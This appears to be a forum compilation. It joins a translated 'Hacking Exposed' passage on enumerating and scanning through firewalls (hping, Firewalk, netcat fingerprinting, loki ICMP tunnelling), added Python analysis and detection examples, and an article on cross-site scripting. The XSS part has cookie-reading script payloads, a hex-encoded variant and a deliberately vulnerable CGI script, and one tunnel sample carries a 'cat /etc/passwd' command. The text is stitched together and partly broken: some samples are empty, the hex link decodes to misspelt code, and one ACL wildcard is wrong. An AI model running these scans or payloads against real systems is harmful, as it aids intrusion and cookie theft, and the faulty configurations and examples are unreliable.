21:26:26.282482 172.18.20.55.7 > 172.29.11.207.39667: R 0:0(0) ack 3963453111 win 0 (DF) (ttl 44, id 50441)
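The inference nmap makes here (and the flags=SA / flags=RA readings hping gives later on the page) can be reproduced from raw packets. The following added Python example, which is not from nmap, hping or the book, classifies a probe result as open, unfiltered or filtered: a SYN/ACK means open, a RST/ACK means unfiltered, and silence or an ICMP type 3 code 13 means filtered. For the ICMP case it reads the filtering device from the outer IP source address and the blocked port from the quoted TCP header, which is the matching nmap does. The packets are constructed in the block with the addresses from the tcpdump output above; the zero IP checksum and fixed TTL are simplifications.

```python
"""Classify a probed TCP port from the reply (or silence), the way nmap and hping read it."""
import struct
from typing import Optional

TCP_FLAG_NAMES = {0x01: "FIN", 0x02: "SYN", 0x04: "RST", 0x08: "PSH", 0x10: "ACK", 0x20: "URG"}


def tcp_flags(flag_byte: int) -> set:
    return {name for bit, name in TCP_FLAG_NAMES.items() if flag_byte & bit}


def _ip(addr: bytes) -> str:
    return ".".join(str(b) for b in addr)


def parse_icmp_unreachable(packet: bytes) -> dict:
    """Decode an ICMP destination-unreachable message. The outer source address is the
    device that filtered the probe; the quoted inner IP+TCP header gives target and port."""
    ihl = (packet[0] & 0x0F) * 4
    icmp = packet[ihl:]
    icmp_type, code = icmp[0], icmp[1]
    inner_ip = icmp[8:]                       # quoted original IP header + first 8 transport bytes
    inner_ihl = (inner_ip[0] & 0x0F) * 4
    sport, dport = struct.unpack("!HH", inner_ip[inner_ihl:inner_ihl + 4])
    return {"type": icmp_type, "code": code, "filter": _ip(packet[12:16]),
            "target": _ip(inner_ip[16:20]), "src_port": sport, "port": dport}


def classify(reply: Optional[bytes]) -> str:
    """None means no answer; otherwise a raw IPv4 packet carrying TCP (proto 6) or ICMP (proto 1)."""
    if reply is None:
        return "filtered"                     # neither SYN/ACK nor RST/ACK came back
    ihl = (reply[0] & 0x0F) * 4
    proto = reply[9]
    if proto == 6:
        flags = tcp_flags(reply[ihl + 13])    # flags byte is offset 13 of the TCP header
        if {"SYN", "ACK"} <= flags:
            return "open"
        if {"RST", "ACK"} <= flags:
            return "unfiltered"               # the host (or a firewall spoofing it) says closed
        return "unknown"
    if proto == 1:
        info = parse_icmp_unreachable(reply)
        if info["type"] == 3 and info["code"] == 13:
            return "filtered"                 # admin prohibited: an ACL dropped the probe
        return "unreachable"
    return "unknown"


# --- constructed packets standing in for a capture (not real traffic) ---

def _addr(text: str) -> bytes:
    return bytes(int(x) for x in text.split("."))


def build_ip(proto: int, src: str, dst: str, payload: bytes) -> bytes:
    """Minimal IPv4 header with a zero checksum; enough for header parsing."""
    header = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(payload), 0, 0, 64, proto, 0,
                         _addr(src), _addr(dst))
    return header + payload


def build_tcp(sport: int, dport: int, flags: int) -> bytes:
    return struct.pack("!HHIIBBHHH", sport, dport, 0, 0, 5 << 4, flags, 9112, 0, 0)


def build_admin_prohibited(firewall: str, scanner: str, target: str, sport: int, dport: int) -> bytes:
    """ICMP type 3 code 13 sent by `firewall`, quoting the SYN the scanner sent to target:dport."""
    original = build_ip(6, scanner, target, build_tcp(sport, dport, 0x02))
    icmp = struct.pack("!BBHI", 3, 13, 0, 0) + original[:28]   # 8-byte ICMP header + 20 + 8 quoted
    return build_ip(1, firewall, scanner, icmp)


if __name__ == "__main__":
    pkt = build_admin_prohibited("10.55.2.1", "172.29.11.207", "172.32.12.4", 39667, 23)
    print(classify(pkt), parse_icmp_unreachable(pkt))
```

A Check Point REJECT rule that answers with a spoofed RST/ACK, as the page notes, lands in "unfiltered" here just as it does in nmap; only the TTL and timing of such replies hint that a firewall rather than the host produced them.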

Countermeasures

To stop attackers enumerating router and firewall ACLs through the "admin prohibited filter" technique, disable the router's ability to send ICMP type 3 code 13 messages. On Cisco, do this by stopping the device from sending IP unreachable messages with the interface command no ip unreachables.

5. Port Identification

Some firewalls have a unique fingerprint that shows up as a series of numbers distinguishing them from other firewalls. For example, Check Point displays a series of numbers when you connect to its SNMP management port, TCP 257. Although the mere presence of ports 256-259 on a system is usually a good indicator of Check Point Firewall-1, the following test confirms it:

Code:
[root@bldg_043]# nc -v -n 192.168.51.1 257
(UNKNOWN) [192.168.51.1] 257 (?) open
30000003

[root@bldg_043]# nc -v -n 172.29.11.191 257
(UNKNOWN) [172.29.11.191] 257 (?) open
31000000

Countermeasures

Detection

To detect an attacker's connections to your ports, add a connection event in RealSecure. Follow these steps:
1. Edit the policy.
2. Select the Connection Events tab.
3. Select the Add Connection button and fill in an entry for Check Point.
4. Select the drop-down and select the Add button.
5. Fill in the service and port, and click OK.
6. Select the new port, and click OK again.
7. Now select OK and apply the policy to the engine.

Prevention

To prevent connections to TCP port 257, block them at your upstream routers. A simple Cisco ACL such as the one below can markedly blunt an attacker's efforts:

Code:
access-list 101 deny tcp any any eq 257 log ! Block Firewall-1 scans

III. Scanning Through Firewalls

Don't worry, this section isn't going to hand you some magic technique for disabling firewalls. Instead, we'll look at a number of techniques for dancing around firewalls and gathering some important information about the various paths through and around them.

1. hping

hping, by Salvatore Sanfilippo, works by sending TCP packets to a destination port and reporting the packets it receives back. hping returns a variety of responses depending on numerous conditions. Each packet, in part and as a whole, can provide a fairly clear picture of the firewall's access-control types. For example, with hping we can discover open, blocked, dropped, and rejected packets.

In the following example, hping reports that port 80 is open and ready to receive a connection. We know this because it received a packet with the SA flags set (a SYN/ACK packet).

Code:
# hping www.yourcompany.com -c2 -S -p80 -n
HPING www.yourcompany.com (eth0 172.30.1.20): S set, 40 data bytes
60 bytes from 172.30.1.20: flags=SA seq=0 ttl=242 id=65121 win=64240 time=144.4 ms

Now we know there is an open port through to our target, but we don't yet know where the firewall is. In the next example, hping reports receiving an ICMP unreachable type 13 from 192.168.70.2. An ICMP type 13 is an ICMP admin-prohibited filter packet, usually sent by a packet-filtering router.

Code:
# hping www.yourcompany.com -c2 -S -p23 -n
HPING www.yourcompany.com (eth0 172.30.1.20): S set, 40 data bytes
ICMP Unreachable type 13 from 192.168.70.2

Now it is confirmed: 192.168.70.2 is most likely the firewall, and we know it is blocking port 23 to our target. In other words, if the system is a Cisco router, it probably has a line like the one below in its config file:

Code:
access-list 101 deny tcp any any 23 ! telnet

In the next example, we receive an RST/ACK packet back, which signals one of two things: (1) the packet got through the firewall and the server is not listening on that port, or (2) the firewall rejected the packet (as with Check Point's reject rule).

Code:
# hping 192.168.50.3 -c2 -S -p22 -n
HPING 192.168.50.3 (eth0 192.168.50.3): S set, 40 data bytes
60 bytes from 192.168.50.3: flags=RA seq=0 ttl=59 id=0 win=0 time=0.3 ms

Because we received the ICMP type 13 packet above, we can deduce that the firewall (192.168.70.2) is allowing the packet through, but the server is simply not listening on that port. If the firewall you are scanning through is a Check Point, hping will report the source IP address of the target, but the packet is really being sent from the external NIC of the Check Point firewall. The tricky thing about Check Point is that it answers for its internal systems, sending a response and spoofing the target's address. However, when attackers run into one of these conditions over the Internet, they will never know the difference, because the MAC address will never reach their machine. Finally, when a firewall is blocking packets to a port, you usually get nothing back at all.

Code:
[root@bldg_043 /opt]# hping 192.168.50.3 -c2 -S -p22 -n
HPING 192.168.50.3 (eth0 192.168.50.3): S set, 40 data bytes

This hping result can mean one of two things: (1) the packet could not reach its destination and was lost on the wire, or (2) more likely, a device (probably our firewall, 192.168.70.2) dropped the packet on the floor as part of its ACL rules.
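The reply kinds the nmap and hping examples above turn on (SYN/ACK versus RST/ACK, plus the ICMP type 13 admin-prohibited message) can be pulled out of a tcpdump trace mechanically. The Python below is an added example, not part of the original text nor of nmap or hping; the trace it parses is constructed to mirror the one above, and the TTL comparison it uses to spot RST/ACKs generated by a device in the path (the Check Point REJECT behaviour described above) is a heuristic of this example.

```python
import re
from collections import defaultdict

# Constructed sample modelled on the tcpdump trace above (not a real capture):
# 172.18.20.55 is the scanned host, 192.168.70.2 a filtering device in front of it.
SAMPLE_TRACE = """\
21:26:22.742482 172.18.20.55.258 > 172.29.11.207.39667: S 1415920470:1415920470(0) ack 3963453111 win 9112 (DF) (ttl 254, id 50438)
21:26:23.282482 172.18.20.55.53 > 172.29.11.207.39667: R 0:0(0) ack 3963453111 win 0 (DF) (ttl 44, id 50439)
21:26:24.362482 172.18.20.55.257 > 172.29.11.207.39667: S 1416174328:1416174328(0) ack 3963453111 win 9112 (DF) (ttl 254, id 50440)
21:26:26.282482 172.18.20.55.7 > 172.29.11.207.39667: R 0:0(0) ack 3963453111 win 0 (DF) (ttl 44, id 50441)
21:26:27.102482 192.168.70.2 > 172.29.11.207: icmp: host 172.18.20.55 unreachable - admin prohibited filter (ttl 250, id 7)
"""

IP = r"(?:\d{1,3}\.){3}\d{1,3}"
TCP_RE = re.compile(
    rf"^\S+ (?P<src>{IP})\.(?P<sport>\d+) > (?P<dst>{IP})\.(?P<dport>\d+): "
    rf"(?P<flags>[SRPFU.]+) (?P<rest>.*)\(ttl (?P<ttl>\d+), id \d+\)$")
ICMP_RE = re.compile(
    rf"^\S+ (?P<src>{IP}) > (?P<dst>{IP}): icmp: host (?P<host>{IP}) "
    r"unreachable - admin prohibited filter")


def classify_replies(trace, target, probed_ports):
    """Map each probed port of `target` to the state its reply implies."""
    state = {p: "filtered (no reply)" for p in probed_ports}
    ttl_seen = defaultdict(set)   # reply kind -> TTL values, for the spoof check
    filters = set()               # devices that answered with ICMP type 3 / code 13
    for line in trace.splitlines():
        m = TCP_RE.match(line)
        if m:
            port = int(m["sport"])
            if m["src"] != target or port not in state:
                continue
            acked = " ack " in m["rest"]
            if m["flags"] == "S" and acked:          # SYN/ACK: something is listening
                state[port] = "open"
                ttl_seen["open"].add(int(m["ttl"]))
            elif m["flags"] == "R":                  # RST/ACK: not listening, or a REJECT rule
                state[port] = "unfiltered"
                ttl_seen["unfiltered"].add(int(m["ttl"]))
            continue
        m = ICMP_RE.match(line)
        if m and m["host"] == target:
            filters.add(m["src"])
    return state, dict(ttl_seen), filters


def rst_from_other_device(ttl_seen, slack=4):
    """True when the RST/ACKs carry a TTL far from the SYN/ACKs' TTL: the RSTs
    were most likely produced by a device in the path answering on the host's
    behalf, not by the host itself (heuristic of this example)."""
    opens, rsts = ttl_seen.get("open"), ttl_seen.get("unfiltered")
    if not opens or not rsts:
        return False
    return min(abs(a - b) for a in opens for b in rsts) > slack


if __name__ == "__main__":
    probed = [7, 22, 23, 53, 256, 257, 258]
    state, ttls, filters = classify_replies(SAMPLE_TRACE, "172.18.20.55", probed)
    for port in probed:
        print(f"{port:>5}  {state[port]}")
    print("admin-prohibited replies from:", sorted(filters))
    print("RST/ACKs from another device:", rst_from_other_device(ttls))
```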

Countermeasures

Preventing an hping attack is not easy. The best you can do is simply block ICMP type 13 messages (as described in the countermeasures for nmap scanning above).

2. Firewalk

Firewalk is a nifty little tool that, like a port scanner, is used to discover open ports behind a firewall. Written by Mike Schiffman, also known as Route, and Dave Goldsmith, the utility scans a host downstream from a firewall and reports back the rules allowed to that host without actually touching the target host. Firewalk works by constructing packets with an IP TTL calculated to expire one hop past the firewall. In theory, if the packet is allowed by the firewall, it will be let through and will expire as expected, eliciting an "ICMP TTL expired in transit" message. On the other hand, if the packet is blocked by the firewall's ACL, it will be dropped, and either no response will be sent, or an ICMP type 13 admin-prohibited filter packet will be sent back.

Code:
# firewalk -pTCP -S135-140 10.22.3.1 192.168.1.1
Ramping up hopcounts to binding host...
probe: 1 TTL: 1 port 33434: expired from [exposed.acme.com]
probe: 2 TTL: 2 port 33434: expired from [rtr.isp.net]
probe: 3 TTL: 3 port 33434: Bound scan at 3 hops [rtr.isp.net]
port 135: open
port 136: open
port 137: open
port 138: open
port 139: *
port 140: open

The only problem we have run into with Firewalk is that it can be unpredictable, because some firewalls detect the expired packet before checking their ACLs and send back an ICMP TTL EXPIRED packet anyway. As a result, Firewalk assumes all ports are open.
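A small model of Firewalk's TTL arithmetic, including the misbehaving-gateway case just described. This is an added example, not Firewalk's own code; the hop list, the gateway's ACL, and the rule that the misbehaving gateway reports expiry one hop early, before consulting its ACL, are constructed assumptions of this example.

```python
from dataclasses import dataclass
from typing import Optional

RAMP_PORT = 33434   # port the ramping probes use in the Firewalk output above


@dataclass
class Hop:
    ip: str
    allowed: Optional[set] = None     # None: plain router, forwards everything
    expire_before_acl: bool = False   # the misbehaving gateway described above


def send_probe(path, dport, ttl):
    """Walk one probe down `path`; return (reply_kind, replying_ip)."""
    for hop in path:
        ttl -= 1
        # Model assumption: a well-behaved hop expires a probe only when its TTL
        # reaches 0; the misbehaving gateway answers "expired" one hop early,
        # before it has consulted its ACL.
        if ttl <= (1 if hop.expire_before_acl else 0):
            return "ttl_expired", hop.ip
        if hop.allowed is not None and dport not in hop.allowed:
            return "admin_prohibited", hop.ip     # ICMP type 13 (or silence)
    return "delivered", path[-1].ip


def ramp(path, gateway_ip):
    """Ramping phase: raise the TTL until the expiry comes from the gateway."""
    for ttl in range(1, len(path) + 1):
        kind, ip = send_probe(path, RAMP_PORT, ttl)
        if kind == "ttl_expired" and ip == gateway_ip:
            return ttl
    return None


def firewalk(path, gateway_ip, ports):
    """Bound scan: TTL = gateway hops + 1.  An expiry from the hop behind the
    gateway means the gateway passed the port.  Returns port -> (verdict, ip)."""
    bound = ramp(path, gateway_ip)
    if bound is None:
        raise ValueError("gateway not found on path")
    results = {}
    for port in ports:
        kind, ip = send_probe(path, port, bound + 1)
        results[port] = ("open" if kind == "ttl_expired" else "*", ip)
    return results


def all_expired_at_gateway(results, gateway_ip):
    """Tell-tale of the false positive above: every 'open' verdict rests on an
    expiry sent by the gateway itself rather than by the hop behind it."""
    return all(v == "open" and ip == gateway_ip for v, ip in results.values())


# Constructed path: one router, the filtering gateway, and the metric host one
# hop behind it (addresses reuse the ones in the Firewalk run above).
GATEWAY = "192.168.1.1"
ACL = {135, 136, 137, 138, 140}
PATH_OK = [Hop("10.0.0.1"), Hop(GATEWAY, allowed=ACL), Hop("10.22.3.1")]
PATH_BAD = [Hop("10.0.0.1"), Hop(GATEWAY, allowed=ACL, expire_before_acl=True),
            Hop("10.22.3.1")]

if __name__ == "__main__":
    for name, path in (("well-behaved gateway", PATH_OK), ("expires before ACL", PATH_BAD)):
        res = firewalk(path, GATEWAY, range(135, 141))
        print(name, {p: v for p, (v, _) in res.items()},
              "suspect:", all_expired_at_gateway(res, GATEWAY))
```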

Countermeasures

You can block ICMP TTL EXPIRED packets at the external interface, but this may hurt the firewall's usability, because legitimate clients connecting through it will never learn what happened to their connection.

IV. Packet Filtering

Packet-filtering firewalls such as Check Point's Firewall-1, Cisco PIX, and Cisco IOS (yes, Cisco IOS can be set up as a firewall) rely on ACLs (access control lists) or rules to decide whether traffic is authorized to pass into or out of the internal network. For the most part these ACLs are well designed and hard to get around. But every so often you come across a firewall with liberal ACLs that let some packets through in an open state.

Liberal ACLs

Liberal access control lists (ACLs) are found on firewalls more often than you would think. Consider the case where an organization must let its ISP perform zone transfers. A liberal ACL such as "Allow all activity from source port 53" might be used instead of "Allow activity from the ISP's DNS server with source port 53 and destination port 53." The risk of such misconfigurations can be truly devastating, allowing a hacker to scan the entire network from the outside. Most of these attacks begin with an attacker scanning a server behind the firewall while spoofing port 53 (DNS) as the source port.

Countermeasures

Make sure your firewall rules limit who can connect where. For example, if the ISP needs zone-transfer capability, be explicit in your rules. Require a source IP address and hard-code the destination IP address (your internal DNS server) in the rule you write. If you are using a Check Point firewall, you can use the following rule to restrict source port 53 (DNS) to the ISP's DNS only. For example, if the ISP's DNS is 192.168.66.2 and your internal DNS is 172.30.140.1, you can use the rule below:

Source          Destination     Service      Action   Track
192.168.66.2    172.30.140.1    domain-tcp   Accept   Short
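The difference between the liberal rule and the corrected one, checked against constructed traffic with a tiny first-match rule evaluator. This is an added example, not Check Point or Cisco code; the Packet and Rule classes and the scanning host's addresses are assumptions of this example.

```python
from dataclasses import dataclass
from typing import Optional


@dataclass(frozen=True)
class Packet:
    src: str
    dst: str
    sport: int
    dport: int
    proto: str = "tcp"


@dataclass(frozen=True)
class Rule:
    """One filter rule; a field left as None matches anything ("any")."""
    action: str
    src: Optional[str] = None
    dst: Optional[str] = None
    sport: Optional[int] = None
    dport: Optional[int] = None
    proto: Optional[str] = None

    def matches(self, p: Packet) -> bool:
        checks = ((self.src, p.src), (self.dst, p.dst), (self.sport, p.sport),
                  (self.dport, p.dport), (self.proto, p.proto))
        return all(want is None or want == got for want, got in checks)


def decide(rules, packet, default="drop"):
    """First matching rule wins; anything unmatched falls to the default."""
    for rule in rules:
        if rule.matches(packet):
            return rule.action
    return default


# The liberal rule quoted in the text: "allow all activity from source port 53".
LIBERAL = [Rule("accept", sport=53)]
# The corrected rule: ISP DNS 192.168.66.2 to internal DNS 172.30.140.1, port 53 to 53 only.
STRICT = [Rule("accept", src="192.168.66.2", dst="172.30.140.1",
               sport=53, dport=53, proto="tcp")]

# Constructed traffic: the legitimate zone transfer, and a scan of another
# internal host whose source port has been set to 53.
ZONE_TRANSFER = Packet("192.168.66.2", "172.30.140.1", 53, 53)
SPOOFED_SCAN = Packet("203.0.113.9", "172.30.140.7", 53, 22)

if __name__ == "__main__":
    for name, rules in (("liberal", LIBERAL), ("strict", STRICT)):
        print(name, "zone transfer:", decide(rules, ZONE_TRANSFER),
              "| spoofed scan:", decide(rules, SPOOFED_SCAN))
```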

V. ICMP and UDP Tunneling

ICMP tunneling is the ability to encapsulate real data inside an ICMP header. Many routers and firewalls blindly let ICMP ECHO, ICMP ECHO REPLY, and UDP packets through, and so are vulnerable to this kind of attack. Like the Check Point DNS vulnerability, the ICMP and UDP tunneling attack relies on a system that has already been compromised behind the firewall. Jeremy Rauch and Mike D. Schiffman put the tunneling concept into practice and created the tools to exploit it: loki and lokid (client and server); see http://www.phrack.com/search.phtml?view&article=p49-6. If the lokid server tool is running on a system behind a firewall that allows ICMP ECHO and ECHO REPLY, an attacker can run the client tool (loki), wrapping every command it sends in ICMP ECHO packets to the server (lokid). The lokid tool unwraps the commands, runs them locally, and wraps their output in ICMP ECHO REPLY packets back to the attacker. Using this technique, an attacker can bypass the firewall entirely.
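Detection logic for the traffic pattern a loki-style tunnel produces, run over constructed ICMP packets. This is an added example, not part of the original text; the "normal ping payload" patterns, the size and entropy thresholds, and all addresses are assumptions of this example.

```python
import math
from collections import Counter
from dataclasses import dataclass

ICMP_ECHO_REPLY, ICMP_ECHO = 0, 8   # the two types the text says firewalls let through


@dataclass
class IcmpPacket:
    src: str
    dst: str
    icmp_type: int
    payload: bytes


def looks_like_ping(payload: bytes) -> bool:
    """Payloads ordinary ping clients send (assumption modelled on common
    implementations): Windows sends a 32-byte alphabet run; Unix pings keep a
    timestamp in the first 16 bytes and then fill byte i with the value i."""
    if payload == b"abcdefghijklmnopqrstuvwabcdefghi":
        return True
    if len(payload) <= 16:
        return False
    return all(payload[i] == (i & 0xFF) for i in range(16, len(payload)))


def entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte."""
    n = len(data)
    if not n:
        return 0.0
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def suspicious_reasons(pkt: IcmpPacket, max_len: int = 64) -> list:
    """Why this echo or echo-reply looks like it carries tunnelled data;
    an empty list means it looks like an ordinary ping."""
    if pkt.icmp_type not in (ICMP_ECHO, ICMP_ECHO_REPLY) or looks_like_ping(pkt.payload):
        return []
    reasons = []
    if len(pkt.payload) > max_len:
        reasons.append("payload larger than a normal ping")
    printable = sum(32 <= b < 127 for b in pkt.payload) / max(1, len(pkt.payload))
    if printable > 0.9:
        reasons.append("payload is readable text (commands or output)")
    if entropy(pkt.payload) > 6.0:
        reasons.append("high-entropy payload (encrypted or compressed data)")
    return reasons or ["payload does not match any known ping pattern"]


def scan(packets):
    """Return (index, src, dst, reasons) for every packet worth an analyst's look."""
    return [(i, p.src, p.dst, r) for i, p in enumerate(packets) if (r := suspicious_reasons(p))]


# Constructed packets: two normal pings and a loki-style exchange in which a
# command goes out in an ECHO and encrypted-looking output comes back in a REPLY.
UNIX_PING = bytes(16) + bytes(range(0x10, 0x38))              # 56 bytes
WINDOWS_PING = b"abcdefghijklmnopqrstuvwabcdefghi"
TUNNEL_CMD = b"cat /etc/passwd\n"
TUNNEL_ENC = bytes((i * 97 + 13) % 256 for i in range(200))    # 200 distinct byte values

SAMPLE = [
    IcmpPacket("10.1.1.5", "172.29.10.20", ICMP_ECHO, UNIX_PING),
    IcmpPacket("172.29.10.20", "10.1.1.5", ICMP_ECHO_REPLY, UNIX_PING),
    IcmpPacket("10.1.1.7", "172.29.10.20", ICMP_ECHO, WINDOWS_PING),
    IcmpPacket("198.51.100.4", "172.29.10.20", ICMP_ECHO, TUNNEL_CMD),
    IcmpPacket("172.29.10.20", "198.51.100.4", ICMP_ECHO_REPLY, TUNNEL_ENC),
]

if __name__ == "__main__":
    for idx, src, dst, reasons in scan(SAMPLE):
        print(f"packet {idx} {src} -> {dst}: {'; '.join(reasons)}")
```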

Countermeasures

To prevent this type of attack, either disable ICMP access through the firewall or provide granular access control over ICMP traffic. For example, the Cisco ACL below disables all ICMP traffic except to the 172.29.10.0 subnet (the DMZ), for administrative purposes:

Code:
access-list 101 permit icmp any 172.29.10.0 0.255.255.255 8 ! echo
access-list 101 permit icmp any 172.29.10.0 0.255.255.255 0 ! echo-reply
access-list 102 deny ip any any log ! deny and log all else

Caution: if your ISP monitors the uptime of your systems behind the firewall with ICMP pings (not advisable at all!), these ACLs will break that monitoring. Contact your ISP to find out whether they use ICMP pings to check on your systems.

Summary

In practice, a well-configured firewall can be quite hard to get past. But using information-gathering tools such as traceroute, hping, and nmap, attackers can discover (or at least deduce) the access paths through routers and firewalls, as well as the type of firewall you are using. Many current vulnerabilities stem from misconfigured firewalls or a lack of administrative oversight, but either way the result can be a devastating attack if exploited. Some weaknesses can exist in both proxies and packet-filtering firewalls, including unauthenticated web, telnet, and localhost logins. In most cases specific countermeasures can be applied to prevent these vulnerabilities from being exploited; in a few cases only detection techniques can be applied. Many believe the inevitable future of firewalls is a hybrid of application proxy and stateful packet-filtering technology that includes techniques to limit the possibility of misconfiguration. Reactive features will also be part of next-generation firewalls. NAI implements such a form with its Active Security architecture: as soon as an intrusion is detected, pre-designed changes are automatically launched and applied to the affected firewall. For example, if an IDS can detect ICMP tunneling, the product can direct the firewall to close ICMP ECHO requests into the firewall. Such a scenario is always an opportunity for a DDoS attack, which is why experienced security staff are always needed.

Source: Hacking Exposed

A Brief Introduction to the CROSS-SITE SCRIPTING Attack Technique

Source: HVA Online. Author: Luke

# A brief introduction to the CROSS-SITE SCRIPTING attack technique # Vietnamese Version - Luke - HVA Copyrighted # 07/27/03 #

Cross-Site Scripting (XSS) is one of the most widespread attack techniques today, and it is also one of the important security issues for web developers and web users alike. Any website that lets users post information without strictly checking for dangerous code may harbour XSS flaws. In this article I will briefly cover XSS along with some of my experience with this attack technique.

1. What is XSS?

Cross-Site Scripting, abbreviated XSS (rather than CSS, to avoid confusion with Cascading Style Sheets), is an attack technique that injects into dynamic websites (ASP, PHP, CGI, JSP, ...) HTML tags or dangerous script code that can harm the site's other users. The dangerous code injected is mostly written in client-side scripting languages such as JavaScript, JScript, and DHTML, and may also consist of HTML tags. XSS quickly became one of the most common flaws in web applications, and the threat it poses to users keeps growing. The winner of the eWeek OpenHack 2002 contest was the person who found 2 new XSS flaws. It seems the danger from XSS is getting more and more attention.

2. How does XSS work?

Basically XSS, like SQL Injection or Source Injection, is a request sent from a client machine to the server in order to inject information beyond the server's control. It may be a request sent from a data form, or it may simply be a URL such as

Code:
http://www.example.com/search.cgi?query=<script>alert('XSS was found !');</script>

And most likely your browser will pop up the message "XSS was found !". The code inside the tag is not limited in any way, because it can be replaced entirely by a source file on another server via the tag's src attribute. That is why we cannot yet measure the full danger of XSS flaws. But whereas other attack techniques can alter the web server's own data (source code, structure, database), XSS only harms the website on the client side, and the direct victims are the visitors browsing that site. Of course hackers sometimes use this technique to deface websites, but even then it only attacks the surface of the website. Indeed, XSS consists of client-side scripts; these code snippets only run in the client's browser, so XSS does not affect the website system on the server. XSS targets none other than the website's other users: when they inadvertently visit pages containing the dangerous code a hacker left there, they may be redirected to other websites, have their homepage reset, or worse, lose a password or a cookie; your computer may even be infected with viruses, backdoors, worms, ...

3. Be alert to XSS

There is probably no need to list the dangers of XSS, but in practice, if you have a little understanding of XSS you no longer need to fear it. Indeed, you can avoid being attacked through XSS flaws entirely if you understand them well. Any HTML tag can be a tool for an XSS attack, and of these the IMG and IFRAME tags can make your browser load other websites when the HTML is rendered. Take for example the BadTrans Worm, a worm that used the IFRAME tag to spread through systems using Outlook or Outlook Express:

Code:
--====_ABC1234567890DEF_====
Content-Type: multipart/alternative;
        boundary="====_ABC0987654321DEF_===="

--====_ABC0987654321DEF_====
Content-Type: text/html;
        charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

--====_ABC0987654321DEF_====--

--====_ABC1234567890DEF_====
Content-Type: audio/x-wav;
        name="filename.ext.ext"
Content-Transfer-Encoding: base64
Content-ID:

Sometimes, while reading mail, you are redirected to another website; did it occur to you that you might lose your password? A while back, a whole series of Yahoo mailboxes lost their passwords or had mail stolen for no apparent reason. Perhaps when you opened those mails you were not alert to XSS; it is not only attachments that can be dangerous to you. With just one HTML snippet sent in a mail you can lose your cookie completely:

CODE

So when you receive the mail, if you inadvertently move the mouse over the attached picture, your cookie has been taken. And with the stolen cookie, a hacker can easily log in to your mailbox without knowing your password. I was really surprised to find that Yahoo, having blocked most of the threats from HTML tags, had overlooked the IMG tag. By 12/7/2003 Yahoo had promptly patched this serious hole, but that is no reason to drop your guard against a website's "flaws". If you come across a link of the form

http://example.com/search.cgi?query=<script>alert(document.cookie)</script>

you will surely examine it carefully before clicking. Perhaps you will turn off JavaScript in your browser before clicking, or at least be a little wary. But what if you come across a link like this one:

Code:
http://example.com/search.cgi?%71%75%65%61%72%79%3D%3C%73%63%72%69%70%74%3E%61%6C%65%61%72%74%28%64%63%75%6D%65%6E%6C%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%74%3E

It is really the same link as before, only encoded. Part of the link's characters have been replaced by their HEX codes; your browser, of course, still understands what the real address is. So you may well run into dangerous code if you let your guard down against XSS. Naturally there are many other kinds of attack, some already found and some whose scope is not yet known, but within the scope of this article I hope the few examples above have given you some understanding of XSS.

4. How do you detect XSS?

If you use the source code of ready-made programs, you can consult the list of vulnerabilities for your program on security websites such as securityfocus.com, securiteam.com, and others. However, if the website's code was written in-house, that method does not apply. In that case you need automated scanners. If you work in a Windows environment you can use N-Stealth or AppScan, which are excellent scanners: they not only check for XSS flaws but also let you check for other flaws in the website or server. Of course you do not always need to check everything; if you only want to check a website for XSS flaws, screamingCSS is all you need. It is a Perl script that opens connections to the website (using Perl's socket) to check for XSS flaws. Moreover, you can use it in both Unix and Windows environments.

5. How do you prevent XSS?

Nobody can fully measure the danger of XSS, but it is not too hard to prevent. There are many ways to solve the problem. OWASP (The Open Web Application Standard Project) says that to build highly secure websites you should, for user data:
+ Only accept valid data.
+ Reject bad data.
+ Continuously check and sanitize data.
In practice, however, there are cases where you must accept every kind of data, or there is no suitable filter. So you need your own way of dealing with it. One commonly used method is to encode special characters before printing them to the website, especially anything that could be dangerous to users. In that case the special characters of a tag are converted to their HTML entities, so it is still printed on screen without posing any danger to users. Take as an example the script search.cgi, whose source is:

Code:
#!/usr/bin/perl
use CGI;

my $cgi = CGI->new();
my $query = $cgi->param('query');
print $cgi->header();
print "You entered $query";

This script is flawed through and through, because it prints the entered data straight back out. Naturally it prints it as HTML, so not only does it fail to show the input exactly as it was entered, it also harbours an XSS flaw. As mentioned above, to solve this problem we can encode the HTML special characters with the HTML::Entities::encode() function. That gives us a better version of the source:

Code:
#!/usr/bin/perl
use CGI;
use HTML::Entities;

my $cgi = CGI->new();
my $text = $cgi->param('text');
print $cgi->header();
print "You entered ", HTML::Entities::encode($text);
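The flawed script, the encoding fix, and the hex-encoded-link trick from section 3, reworked in Python. This is an added example, not the article's Perl; render_vulnerable, render_safe, reveal_link and the constructed links are names and values chosen for this example.

```python
import html
import re
from urllib.parse import unquote, urlsplit


def render_vulnerable(query: str) -> str:
    """Same defect as the first search.cgi: the input is echoed as raw HTML."""
    return f"You entered {query}"


def render_safe(query: str) -> str:
    """Equivalent of the HTML::Entities::encode() fix: <, >, &, and quotes become
    entities, so the browser displays the text instead of executing it."""
    return "You entered " + html.escape(query, quote=True)


def reveal_link(url: str) -> dict:
    """Percent-decode the whole query string before splitting it, so a link whose
    '=' and '&' were hex-encoded as well (as in the obfuscated link above) still
    shows its real parameters.  Returns {name: value}."""
    decoded = unquote(urlsplit(url).query)
    params = {}
    for pair in decoded.split("&"):
        if pair:
            name, _, value = pair.partition("=")
            params[name] = value
    return params


# Markup that would make a browser run script or fetch another site (assumption of this example).
DANGEROUS = re.compile(r"<\s*/?\s*(script|iframe|img|object|embed)\b|javascript\s*:", re.I)


def link_is_suspicious(url: str) -> bool:
    """True when any decoded parameter name or value carries such markup."""
    return any(DANGEROUS.search(k) or DANGEROUS.search(v) for k, v in reveal_link(url).items())


# Constructed links (not the article's): HEX_LINK is PLAIN_LINK's query rewritten so
# that it carries <script>alert(document.cookie)</script>, with every byte hex-encoded.
PLAIN_LINK = "http://example.com/search.cgi?query=firewall"
HEX_LINK = ("http://example.com/search.cgi?"
            "%71%75%65%72%79%3D%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28"
            "%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%74%3E")

if __name__ == "__main__":
    payload = "<script>alert(1)</script>"
    print(render_vulnerable(payload))
    print(render_safe(payload))
    print(reveal_link(HEX_LINK), link_is_suspicious(HEX_LINK))
```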

